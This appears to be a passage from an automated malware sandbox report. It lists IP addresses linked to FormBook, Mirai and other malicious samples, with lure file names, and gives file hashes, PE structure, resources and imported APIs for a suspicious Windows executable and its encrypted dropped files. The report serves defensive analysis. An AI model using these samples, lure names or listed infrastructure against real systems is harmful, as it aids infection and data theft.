                                                            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.64.208
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            AMAZON-02USwayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                            • 52.39.197.120
                                                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                            • 54.171.230.55
                                                            https://afg.acemlnb.com/lt.php?x=3TZy~GE3UnGZEpJA-w9HgOSc2K2ji_L0wu1gjqXGIXSh587-zEy.zuJr1Y2iitE~judAXHPHJeTMHaWtOdxFVOFx23MoiNDGet hashmaliciousUnknownBrowse
                                                            • 52.210.174.128
                                                            http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                            • 52.11.244.148
                                                            Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                            • 205.251.222.35
                                                            m.elfGet hashmaliciousUnknownBrowse
                                                            • 54.171.230.55
                                                            GUZNpPSg9z.exeGet hashmaliciousAsyncRATBrowse
                                                            • 3.127.181.115
                                                            Recommended Itinerary.jsGet hashmaliciousUnknownBrowse
                                                            • 3.134.125.175
                                                            https://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                            • 3.160.188.127
                                                            zmap.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 54.171.230.55
                                                            CSLDEx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 194.245.186.15
                                                            PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                            • 194.245.148.189
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 194.245.148.189
                                                            nabarm5.elfGet hashmaliciousUnknownBrowse
                                                            • 159.25.233.243
                                                            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 194.245.127.11
                                                            Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                            • 194.245.148.189
                                                            HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                            • 159.25.16.28
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 194.245.148.189
                                                            byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 194.245.150.252
                                                            DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                            • 159.25.16.28
                                                            VODANETInternationalIP-BackboneofVodafoneDEmpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 94.222.49.241
                                                            mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 47.70.148.70
                                                            arm.elfGet hashmaliciousUnknownBrowse
                                                            • 178.7.142.79
                                                            arm7.elfGet hashmaliciousUnknownBrowse
                                                            • 88.73.45.140
                                                            ppc.elfGet hashmaliciousUnknownBrowse
                                                            • 109.44.45.212
                                                            arm6.elfGet hashmaliciousUnknownBrowse
                                                            • 188.98.111.152
                                                            m68k.elfGet hashmaliciousUnknownBrowse
                                                            • 2.203.114.143
                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                            • 82.82.63.65
                                                            bot.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 94.216.58.15
                                                            bot.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 2.202.172.190
                                                            BODIS-NJUSTbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                            • 199.59.243.205
                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 199.59.243.227
                                                            Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                            • 199.59.243.227
                                                            new.exeGet hashmaliciousFormBookBrowse
                                                            • 199.59.243.227
                                                            PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                            • 199.59.243.227
                                                            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                            • 199.59.243.227
                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                            • 199.59.243.227
                                                            Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                            • 199.59.243.227
                                                            http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                            • 199.59.243.227
                                                            DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                            • 199.59.243.227
                                                            No context
                                                            No context
                                                            Process:C:\Windows\SysWOW64\ReAgentc.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):289280
                                                            Entropy (8bit):7.994068738702109
                                                            Encrypted:true
                                                            SSDEEP:6144:aBjLUMOGCjmjJMn0EoTTPHqq0RyD3LnPAM1xQZRo7QFRfNP:aBj4MOGCBn0JTyq0RQnPQM7QFD
                                                            MD5:B4E0090F84D0003EAF6D919BE0BDEB5D
                                                            SHA1:A0C73D3E129F7F1EC45F85874A8B896F39222AAB
                                                            SHA-256:1D1D47C48DD36C022FE38A5F59FD4DE016FCCFB276BC4BF40D5517CD633A1C91
                                                            SHA-512:A22C13173A1BD782D96EFCA833CF2500F61386406448753C2AB9EE8962B67B67BB9ABF4FAFB70D011593944F50D2F8CE446C075208359676CA4880976619D29F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...9I4UYQCN8..Z9.YCLMWJQ.9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9.YCLCH._E.C.t.T....[3Jc)1#*%+<eZ+Z;6!c,]bA/Wc0-l...q(V.Q{TXIj8B3Z9CY:MD.w1".wT2.h#).X...y9$.W..yY-.O...rX%..P 1~,*.JQE9J4UY..N8.2[9.D..MWJQE9J4.YWBE9I3ZaGYCLMWJQE9j!UYUSN8BC^9CY.LMGJQE;J4SYUCN8B3\9CYCLMWJ!A9J6UYUCN8@3..CYSLMGJQE9Z4UIUCN8B3J9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3tM&!7LMW..A9J$UYU.J8B#Z9CYCLMWJQE9J4uYU#N8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUC
                                                            Process:C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):289280
                                                            Entropy (8bit):7.994068738702109
                                                            Encrypted:true
                                                            SSDEEP:6144:aBjLUMOGCjmjJMn0EoTTPHqq0RyD3LnPAM1xQZRo7QFRfNP:aBj4MOGCBn0JTyq0RQnPQM7QFD
                                                            MD5:B4E0090F84D0003EAF6D919BE0BDEB5D
                                                            SHA1:A0C73D3E129F7F1EC45F85874A8B896F39222AAB
                                                            SHA-256:1D1D47C48DD36C022FE38A5F59FD4DE016FCCFB276BC4BF40D5517CD633A1C91
                                                            SHA-512:A22C13173A1BD782D96EFCA833CF2500F61386406448753C2AB9EE8962B67B67BB9ABF4FAFB70D011593944F50D2F8CE446C075208359676CA4880976619D29F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...9I4UYQCN8..Z9.YCLMWJQ.9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9.YCLCH._E.C.t.T....[3Jc)1#*%+<eZ+Z;6!c,]bA/Wc0-l...q(V.Q{TXIj8B3Z9CY:MD.w1".wT2.h#).X...y9$.W..yY-.O...rX%..P 1~,*.JQE9J4UY..N8.2[9.D..MWJQE9J4.YWBE9I3ZaGYCLMWJQE9j!UYUSN8BC^9CY.LMGJQE;J4SYUCN8B3\9CYCLMWJ!A9J6UYUCN8@3..CYSLMGJQE9Z4UIUCN8B3J9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3tM&!7LMW..A9J$UYU.J8B#Z9CYCLMWJQE9J4uYU#N8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUCN8B3Z9CYCLMWJQE9J4UYUC
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.185877674251798
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                                                            File size:1'203'712 bytes
                                                            MD5:31141591ad5afa58b5fdc07ac96c8fff
                                                            SHA1:7b14895f60db4e854feb05a7976e828ba5d343d0
                                                            SHA256:ec78e291d04cd9a16f93570bdee2de454471c35006a50f4b766cece15e011b78
                                                            SHA512:b100d441ea2c65c01cfa19e1263db33e8d2413b3923a58b1123a23e6b7b40165752f550b76a7c20d3cd037dd3020495f287294495deabe9c287c1d4445d01c36
                                                            SSDEEP:24576:su6J33O0c+JY5UZ+XC0kGso6Fa1SmdZI9cr7JJTnqa+NeWY:2u0c++OCvkGs9Fa1SwI9czqhY
                                                            TLSH:DA45CF22B3DDC361CB669173BF69B7016EBF7C610630B95B2F880D7DA950161262C7A3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x427dcd
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x676063A3 [Mon Dec 16 17:30:11 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                            Instruction
                                                            call 00007F784156FE0Ah
                                                            jmp 00007F7841562BD4h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F7841562D5Ah
                                                            cmp edi, eax
                                                            jc 00007F78415630BEh
                                                            bt dword ptr [004C31FCh], 01h
                                                            jnc 00007F7841562D59h
                                                            rep movsb
                                                            jmp 00007F784156306Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007F7841562F24h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007F7841562D60h
                                                            bt dword ptr [004BE324h], 01h
                                                            jc 00007F7841563230h
                                                            bt dword ptr [004C31FCh], 00000000h
                                                            jnc 00007F7841562EFDh
                                                            test edi, 00000003h
                                                            jne 00007F7841562F0Eh
                                                            test esi, 00000003h
                                                            jne 00007F7841562EEDh
                                                            bt edi, 02h
                                                            jnc 00007F7841562D5Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007F7841562D63h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007F7841562DB5h
                                                            bt esi, 03h
                                                            jnc 00007F7841562E08h
                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD4 build 31101
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD4 build 31101
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5d44c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x711c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc70000x5d44c0x5d600252ddf6b188d68d6e1a8fa153c75ef89False0.9291331994645248data7.897967437770075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1250000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xcf7b80x54713data1.0003353812793638
                                                            RT_GROUP_ICON0x123ecc0x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x123f440x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x123f580x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x123f6c0x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x123f800xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x12405c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                            DLLImport
                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
